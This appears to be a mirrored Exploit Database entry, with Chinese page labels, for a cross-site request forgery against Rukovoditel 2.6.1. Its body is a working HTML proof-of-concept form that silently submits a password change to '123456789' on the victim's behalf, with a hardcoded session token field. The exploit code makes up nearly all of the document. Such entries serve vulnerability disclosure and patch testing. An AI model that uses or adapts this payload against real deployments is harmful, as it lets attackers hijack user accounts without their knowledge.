Rukovoditel 2.6.1 – Cross-Site Request Forgery (Change password)

• Exploit Database
• 150 阅读

• 作者： KeopssGroup0day,Inc
  日期： 2020-12-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49245/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password) # Date: 2020-12-14 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: v2.6.1 # Tested on: Kali Linux   POC(localhost/index.php?module=users/change_password):   <html> <!-- CSRF PoC--> <body> <script>history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)</script> <form action="https://localhost/index.php?module=users/change_password&action=change" method="POST"> <input type="hidden" name="form&#95;session&#95;token" value="D&#94;HUyTDh0X" /> <input type="hidden" name="password&#95;new" value="123456789" /> <input type="hidden" name="password&#95;confirmation" value="123456789" /> <input type="submit" value="Submit request" /> </form> </body> </html>     --